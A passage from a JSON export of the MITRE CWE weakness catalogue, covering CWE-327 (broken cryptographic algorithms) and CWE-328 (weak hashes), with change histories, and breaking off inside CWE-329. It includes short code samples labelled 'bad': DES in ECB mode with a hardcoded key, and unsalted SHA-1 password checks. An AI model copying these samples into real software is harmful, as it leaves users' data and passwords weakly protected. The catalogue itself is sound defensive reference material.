Maintenance_Notes, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Maintenance_Notes, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Weak Encryption","attr":{"@_Date":"2009-07-27"}}}},"327":{"attr":{"@_ID":"327","@_Name":"Use of a Broken or Risky Cryptographic Algorithm","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information.","Extended_Description":"The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Well-known techniques may exist to break the algorithm.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"311","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["Cryptographic algorithms are the methods by which data is scrambled. There are a small number of well-understood and heavily studied algorithms that should be used by most applications. It is quite difficult to produce a secure algorithm, and even high profile algorithms by accomplished cryptographic experts have been broken.","Since the state of cryptography advances so rapidly, it is common for an algorithm to be considered \\"unsafe\\" even if it was once thought to be strong. This can happen when new attacks against the algorithm are discovered, or if computing power increases so much that the cryptographic algorithm no longer provides the amount of protection that was originally thought."]}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The confidentiality of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The integrity of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm."},{"Scope":["Accountability","Non-Repudiation"],"Impact":"Hide Activities","Note":"If the cryptographic algorithm is used to ensure the identity of the source of the data (such as digital signatures), then a broken algorithm will compromise this scheme and the source of the data cannot be proven."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Analysis","Description":"Automated methods may be useful for recognizing commonly-used libraries or features that have become obsolete.","Effectiveness":"Moderate","Effectiveness_Notes":"False negatives may occur if the tool is not aware of the cryptographic libraries in use, or if custom cryptography is being used."},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis","Binary / Bytecode simple extractor - strings, ELF readers, etc."]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Man-in-the-middle attack tool"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Framework-based Fuzzer","Automated Monitored Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-24"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis.","For example, US government systems require FIPS 140-2 certification.","Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak.","Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267]"]}},{"attr":{"@_Mitigation_ID":"MIT-52"},"Phase":"Architecture and Design","Description":"Ensure that the design allows one cryptographic algorithm can be replaced with another in the next generation or version. Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. This is especially important for hardware, which can be more difficult to upgrade quickly than software.","Effectiveness":"Defense in Depth"},{"Phase":"Architecture and Design","Description":"Carefully manage and protect cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography itself is irrelevant."},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Industry-standard implementations will save development time and may be more likely to avoid errors that can occur during implementation of cryptographic algorithms. Consider the ESAPI Encryption feature."]}},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"These code examples use the Data Encryption Standard (DES).","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"EVP_des_ecb();"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cipher des=Cipher.getInstance(\\"DES...\\");des.initEncrypt(key2);","xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function encryptPassword($password){}","xhtml:div":{"#text":"$iv_size = mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_ECB);$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);$key = \\"This is a password encryption key\\";$encryptedPassword = mcrypt_encrypt(MCRYPT_DES, $key, $password, MCRYPT_MODE_ECB, $iv);return $encryptedPassword;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}}],"Body_Text":"Once considered a strong algorithm, DES now regarded as insufficient for many applications. It has been replaced by Advanced Encryption Standard (AES)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-3775","Description":"Product uses \\"ROT-25\\" to obfuscate the password in the registry.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3775"},{"Reference":"CVE-2007-4150","Description":"product only uses \\"XOR\\" to obfuscate sensitive data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4150"},{"Reference":"CVE-2007-5460","Description":"product only uses \\"XOR\\" and a fixed key to obfuscate sensitive data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5460"},{"Reference":"CVE-2005-4860","Description":"Product substitutes characters with other characters in a fixed way, and also leaves certain input characters unchanged.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4860"},{"Reference":"CVE-2002-2058","Description":"Attackers can infer private IP addresses by dividing each octet by the MD5 hash of \'20\'.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2058"},{"Reference":"CVE-2008-3188","Description":"Product uses DES when MD5 has been specified in the configuration, resulting in weaker-than-expected password hashes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3188"},{"Reference":"CVE-2005-2946","Description":"Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2946"},{"Reference":"CVE-2007-6013","Description":"Product uses the hash of a hash for authentication, allowing attackers to gain privileges if they can obtain the original hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6013"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using a broken or risky cryptographic algorithm"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC32-C","Entry_Name":"Properly seed pseudorandom number generators","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-327"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"20"}},{"attr":{"@_CAPEC_ID":"459"}},{"attr":{"@_CAPEC_ID":"473"}},{"attr":{"@_CAPEC_ID":"475"}},{"attr":{"@_CAPEC_ID":"608"}},{"attr":{"@_CAPEC_ID":"614"}},{"attr":{"@_CAPEC_ID":"97"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-280"}},{"attr":{"@_External_Reference_ID":"REF-281"}},{"attr":{"@_External_Reference_ID":"REF-282"}},{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-284"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, "Cryptographic Foibles" Page 259"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 21: Using the Wrong Cryptography." Page 315"}},{"attr":{"@_External_Reference_ID":"REF-287"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Insufficient or Obsolete Encryption", Page 44"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-327"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Using a Broken or Risky Cryptographic Algorithm","attr":{"@_Date":"2008-04-11"}}}},"328":{"attr":{"@_ID":"328","@_Name":"Use of Weak Hash","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack).","Extended_Description":{"xhtml:p":["A hash function is defined as an algorithm that maps arbitrarily sized data into a fixed-sized digest (output) such that the following properties hold:","Building on this definition, a cryptographic hash function must also ensure that a malicious actor cannot leverage the hash function to have a reasonable chance of success at determining any of the following:","What is regarded as \\"reasonable\\" varies by context and threat model, but in general, \\"reasonable\\" could cover any attack that is more efficient than brute force (i.e., on average, attempting half of all possible combinations). Note that some attacks might be more efficient than brute force but are still not regarded as achievable in the real world.","Any algorithm does not meet the above conditions will generally be considered weak for general use in hashing.","In addition to algorithmic weaknesses, a hash function can be made weak by using the hash in a security context that breaks its security guarantees. For example, using a hash function without a salt for storing passwords (that are sufficiently short) could enable an adversary to create a \\"rainbow table\\" [REF-637] to recover the password under certain conditions; this attack works against such hash functions as MD5, SHA-1, and SHA-2."],"xhtml:ul":[{"xhtml:li":["1. The algorithm is not invertible (also called \\"one-way\\" or \\"not reversible\\")","2. The algorithm is deterministic; the same input produces the same digest every time"]},{"xhtml:li":["1. the original input (preimage attack), given only the digest","2. another input that can produce the same digest (2nd preimage attack), given the original input","3. a set of two or more inputs that evaluate to the same digest (birthday attack), given the actor can arbitrarily choose the inputs to be hashed and can do so a reasonable amount of times"]}]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"326","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-4900","Description":"SHA-1 algorithm is not collision-resistant.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4900"},{"Reference":"CVE-2020-25685","Description":"DNS product uses a weak hash (CRC32 or SHA-1) of the query name, allowing attacker to forge responses by computing domain names with the same hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25685"},{"Reference":"CVE-2012-6707","Description":"blogging product uses MD5-based algorithm for passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6707"},{"Reference":"CVE-2019-14855","Description":"forging of certificate signatures using SHA-1 collisions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855"},{"Reference":"CVE-2017-15999","Description":"mobile app for backup sends SHA-1 hash of password in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15999"},{"Reference":"CVE-2006-4068","Description":"Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4068"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Reversible One-Way Hash"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"461"}},{"attr":{"@_CAPEC_ID":"68"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-289"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Common Vulnerabilities of Integrity", Page 47"}},{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-637"}},{"attr":{"@_External_Reference_ID":"REF-1243"}},{"attr":{"@_External_Reference_ID":"REF-1244"}}]},"Notes":{"Note":{"#text":"Since CWE 4.4, various cryptography-related entries including CWE-328 have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"329":{"attr":{"@_ID":"329","@_Name":"Generation of Predictable IV with CBC Mode","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key.","Extended_Description":{"xhtml:p":"CBC mode eliminates a weakness of Electronic Code\\n\\t Book (ECB) mode by allowing identical plaintext blocks to\\n\\t be encrypted to different ciphertext blocks. This is\\n\\t possible by the XOR-ing of an IV with the initial plaintext\\n\\t block so that every plaintext block in the chain is XOR\'d\\n\\t with a different value before encryption. If IVs are\\n\\t reused, then identical plaintexts would be encrypted to\\n\\t identical ciphertexts. However, even if IVs are not\\n\\t identical but are predictable, then they still break the\\n\\t security of CBC mode against Chosen Plaintext Attacks\\n\\t (CPA)."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1204","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["CBC mode 